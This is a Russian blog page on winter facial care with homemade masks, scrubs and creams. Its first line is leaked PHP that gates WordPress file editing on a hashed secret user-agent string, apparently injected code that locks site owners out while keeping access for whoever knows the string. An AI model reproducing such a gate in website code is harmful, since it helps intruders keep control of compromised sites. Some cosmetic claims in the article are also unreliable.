if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Как правильно ухаживать за кожей лица зимой? | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Секреты правильного ухода за кожей лица зимой

Сегодня мы расскажем, как с помощью натуральной косметики зимой сделать свою кожу бархатистой и здоровой. Вы узнаете секреты и основные приемы по уходу за лицом в зимнее время

Каче­ствен­ный уход за собой дает воз­мож­ность в тече­нии дол­гих лет выгля­деть юной и при­вле­ка­тель­ной. Одна­ко не сто­ит забы­вать, что чело­век  – это неотъ­ем­ле­мая часть при­ро­ды. На него, так­же как и на окру­жа­ю­щую сре­ду, ока­зы­ва­ет вли­я­ние сме­на вре­мен года и погод­ных усло­вий. Так, для зимы харак­тер­ны  спе­ци­фи­че­ские и более интен­сив­ные кос­ме­ти­че­ские про­це­ду­ры по уходу за кожей лица.

Зимой про­яв­ля­ют­ся допол­ни­тель­ные фак­то­ры, агрес­сив­но вли­я­ю­щие на кожу. К ним относятся:

  1. очень низ­кая влаж­ность в поме­ще­ни­ях, вызван­ная цен­тра­ли­зо­ван­ным отоплением;
  2. силь­ный ветер и низ­кие тем­пе­ра­ту­ры, кото­рые гру­бят кожу и могут при­ве­сти к обморожению;
  3. нехват­ка вита­ми­нов и лет­не­го солнца;

Ниже при­ве­де­на выбор­ка луч­ших (по мне­нию авто­ра) рецеп­тов кос­ме­то­ло­гов по этой тематике.

Открытие пор с помощью паровых ванн

226Для эффек­тив­но­го очи­ще­ния пор в про­цес­се ухо­да за кожей лица  мож­но исполь­зо­вать паро­вую ван­ну. При­чем жен­щи­нам с ком­би­ни­ро­ван­ной или жир­ной кожей нуж­но делать ее каж­дую неде­лю. При осталь­ных типах кожи часто­та при­ме­не­ния состав­ля­ет до 2 раз в месяц.

В пред­ва­ри­тель­но подо­гре­той воде замо­чить сухой сбор трав шал­фея, мяты или ромашки.

Накрыть голо­ву поло­тен­цем и сде­лать  инга­ля­цию кожи лица этим насто­ем. Те же, кому эта про­це­ду­ра напо­ми­на­ет лече­ние про­сту­ды, вызы­вая нега­тив­ные ассо­ци­а­ции, мож­но вос­поль­зо­вать­ся ком­прес­сом: нало­жить на лицо смо­чен­ное в тра­вя­ном рас­тво­ре и отжа­тое поло­тен­це. После того, как оно осты­нет, про­де­лать эту про­це­ду­ру снова.

На замет­ку:

Неж­ную  кожу под гла­за­ми во вре­мя выпол­не­ния инга­ля­ции защи­тит крем.

Очищение скрабом

После рас­па­ри­ва­ния кожи самое вре­мя при­сту­пить к ее очи­ще­нию. При­го­то­вим  нату­раль­ную кос­ме­ти­ку сво­и­ми рука­ми. Для ягод­но­го скра­ба нам пона­до­бят­ся яго­ды мали­ны, клуб­ни­ки или смо­ро­ди­ны, кото­рые необ­хо­ди­мо измель­чить, напри­мер, вил­кой. В слу­чае, если яго­ды замо­ро­жен­ные, пред­ва­ри­тель­но раз­мо­ро­зим их. Скраб готов. Оста­лось про­мок­нуть лицо сал­фет­кой и нане­сти на него ягод­ную мас­су лег­ки­ми мас­си­ру­ю­щи­ми движениями.

На замет­ку:

- Обла­да­тель­ни­цам  ком­би­ни­ро­ван­ной и жир­ной кожи в состав скра­ба нуж­но доба­вить чай­ную лож­ку пова­рен­ной соли.

- Для сухо­го и чув­стви­тель­но­го к воз­дей­ствию фрук­то­вых кис­лот типа кожи подой­дет ягод­ный скраб, смяг­чен­ный неболь­шим коли­че­ством сметаны.

Пра­ви­ло для всех типов кожи (осо­бен­но жир­ной) гла­сит, что в кос­ме­ти­ке не долж­но быть спир­та. Это каса­ет­ся как изго­тов­ле­ния кос­ме­ти­ки в домаш­них усло­ви­ях , так и фаб­рич­но­го производства.

Восстановительный уход для разных типов кожи

Нормальный тип

Кос­ме­то­ло­ги реко­мен­ду­ют вла­де­ли­цам нор­маль­но­го типа кожи   для умы­ва­ния лица  исполь­зо­вать воду ком­нат­ной тем­пе­ра­ту­ры. Завер­шать же умы­ва­ние сле­ду­ет неболь­шим сеан­сом зака­ли­ва­ния очень холод­ной водой.

На замет­ку:

Не сто­ит умы­вать­ся излишне жест­кой водо­про­вод­ной водой. Сна­ча­ла нуж­но про­ки­пя­тить ее и допол­ни­тель­но смяг­чить моло­ком в про­пор­ции 1:2 (1 часть моло­ка и 2 части воды).

250889-frederika-1024x768Полез­ны­ми и пита­тель­ны­ми будут лег­кие в при­го­тов­ле­нии и при­ме­не­нии отру­бе­вые мас­ки. Их рецеп­ты про­сты. Отру­би зали­ва­ют­ся теп­лым тра­вя­ным отва­ром, моло­ком или про­сто кипя­че­ной водой. Затем нано­сят­ся тол­стым сло­ем на лицо на 20 минут. После чего смы­ва­ют­ся водой. Часто­та при­ме­не­ния  – 3 раза в неделю.

Сухой тип

Сюда же отно­сит­ся чув­стви­тель­ная и зре­лая кожа. Такую кожу луч­ше допол­ни­тель­но смяг­чать до умы­ва­ния. Для это­го подой­дет мас­ка  из желт­ка, сто­ло­вой лож­ки сме­та­ны и сто­ло­вой лож­ки меда в рав­ных частях. После умы­ва­ния  сухую кожу хоро­шо опо­лас­ки­вать насто­ем из трав шал­фея, ромаш­ки, шипов­ни­ка и мяты(в ста­кан кипя­щей воды добав­ля­ет­ся сто­ло­вая лож­ки раз­но­тра­вья и наста­и­ва­ет­ся 20 минут)

Нель­зя забы­вать зимой о пита­нии кожи, кото­рую обес­пе­чит лечеб­ная кос­ме­ти­ка  handmade в виде спе­ци­аль­ной мас­ки, состо­я­щей из:

  • овся­ной муки либо смо­ло­тых в кофе­мол­ке зерен овса;
  • чай­ной лож­ки под­сол­неч­но­го масла;
  • несколь­ких капель мас­ля­но­го рас­тво­ра вита­ми­нов А и Е;
  • чай­ной лож­ки сока выжа­то­го из измель­чен­но­го укропа;

После паро­вой ван­ны либо  умы­ва­ния с очи­ще­ни­ем про­во­дит­ся мас­саж лица. Для него пона­до­бит­ся разо­гре­тое кун­жут­ное, олив­ко­вое или обыч­ное под­сол­неч­ное мас­ло.  Повто­рять эту про­це­ду­ру зимой сле­ду­ет в тече­нии 5 минут  еженедельно.

Жирный и комбинированный тип кожи

Про­бле­ма дан­но­го типа кожи заклю­ча­ет­ся в чрез­мер­ной сек­ре­ции саль­ных желез. Сни­зить ее помо­жет умы­ва­ние теп­лой водой с исполь­зо­ва­ни­ем мою­ще­го сред­ства. После чего сле­ду­ет тут же опо­лос­нуть лицо холод­ной водой ( мож­но мине­раль­ной) с добав­ле­ни­ем цит­ру­со­во­го сока, напри­мер, лимо­на или грейпфрута.

Спу­стя день нуж­но нане­сти на кожу про­ти­во­вос­па­ли­тель­ную лечеб­ную кос­ме­ти­ку, при­го­тов­лен­ную по тако­му рецеп­ту: сто­ло­вая лож­ка тра­вя­но­го сбо­ра липо­во­го цве­та, ромаш­ки, хво­ща, шал­фея и мяты засы­па­ет­ся в тер­мос и зали­ва­ет­ся ста­ка­ном кипя­щей воды. Через 30 минут настой готов. Смо­чен­ную в настое сал­фет­ку нуж­но подер­жать на лице  до тех пор, пока она не остынет

В слу­чае рас­ши­рен­ных пор и зем­ли­сто­го цве­та лица  при жир­ной коже помо­гут такие маски:

  1. Клуб­нич­ная: 2 части мало­жир­но­го тво­ро­га сме­шать с 3ягодами клуб­ни­ки, измель­чен­ны­ми в каши­цу, дер­жать на лице 10 минут, после чего смыть холод­ной водой. Сера, содер­жа­ща­я­ся в клуб­ни­ке, дей­ству­ет как про­ти­во­вос­па­ли­тель­ное сред­ство, тво­рог – как увлажняющее.
  2. Мас­ка из томат­ной мякоти.
  3. Мас­ка из взби­то­го бел­ка с тер­тым огурцом.

Защита лица от мороза и ветра

Защит­ный крем явля­ет­ся отлич­ным пре­пят­стви­ем на пути агрес­сив­но­го воз­дей­ствия низ­ких зим­них тем­пе­ра­тур. Его реко­мен­ду­ет­ся нано­сить на лицо за час до выхо­да на ули­цу. Это крем лег­ко будет при­го­то­вить даже для начи­на­ю­щих. В зави­си­мо­сти от типа кожи он вклю­ча­ет в себя:

  • для жир­ной и ком­би­ни­ро­ван­ной кожи: 1 часть олив­ко­во­го мас­ла и 1 части цин­ко­вой мази;
  • для зре­лой, чув­стви­тель­ной и сухой кожи: олив­ко­вое мас­ло и пита­тель­ный крем в про­пор­ции 1: 1;

Спу­стя 20 минут, когда крем впи­та­ет­ся, необ­хо­ди­мо снять с лица его излиш­ки сал­фет­кой и немно­го при­пуд­рить­ся непо­сред­ствен­но перед пред­сто­я­щей мороз­ной прогулкой.

К плю­сам выше­пе­ре­чис­лен­ных мето­дов зим­не­го ухо­да за лицом мож­но отне­сти финан­со­вую выго­ду, ведь в них исполь­зу­ет­ся бес­плат­ная кос­ме­ти­ка, сырьем для кото­рой слу­жат ово­щи и фрук­ты с ого­ро­да. При этом она 100%  нату­раль­на и не содер­жит вред­ных консервантов.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!